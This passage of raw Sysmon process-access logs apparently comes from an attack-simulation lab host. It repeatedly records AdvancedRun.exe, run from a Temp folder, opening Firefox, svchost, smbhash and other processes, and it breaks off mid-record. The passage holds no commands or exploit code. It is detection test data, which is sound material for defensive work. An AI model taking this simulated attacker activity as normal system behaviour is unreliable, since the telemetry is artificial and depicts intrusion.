Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968446Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.759{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6B2-61E9-9C60-000000002402}7820C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968445Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.759{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6AF-61E9-9B60-000000002402}7424C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968444Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.758{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6AF-61E9-9A60-000000002402}7408C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968443Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.758{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6AF-61E9-9960-000000002402}7400C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968442Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.758{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6AD-61E9-9860-000000002402}5388C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968441Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.758{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6AC-61E9-9660-000000002402}3000C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968440Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.758{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6A9-61E9-9560-000000002402}32C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968439Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.758{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6A9-61E9-9460-000000002402}688C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968438Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.757{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6A9-61E9-9360-000000002402}6316C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968437Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.757{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6A8-61E9-9260-000000002402}5876C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968436Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.757{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6A8-61E9-9160-000000002402}4996C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968435Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.757{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6A7-61E9-9060-000000002402}4208C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968434Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.757{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6A6-61E9-8E60-000000002402}6208C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968433Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.756{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-C0D6-61E9-A75B-000000002402}6364C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000002968432Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.756{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-C0D6-61E9-A65B-000000002402}5500C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968431Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.756{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-BF7F-61E9-6C5B-000000002402}4172C:\Windows\system32\ApplicationFrameHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968430Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.756{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-B545-61E9-205A-000000002402}5824C:\Windows\system32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\